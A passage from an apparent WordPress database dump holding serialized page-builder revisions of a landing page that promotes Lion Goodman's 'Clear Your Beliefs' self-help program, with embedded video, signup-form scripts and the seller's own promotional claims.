(1278, 1742, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:507:"<center style="margin-top: -100px;"><div class="video-shadow" style="background-image: url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); background-repeat: no-repeat; background-size: contain; height: 288px; margin-top: 55px; padding-top: 75px; width: 600px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -74px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1258, 1730, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:533:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p><div><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1214, 1691, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:836:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></p><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p><div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div><p>  </p><div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 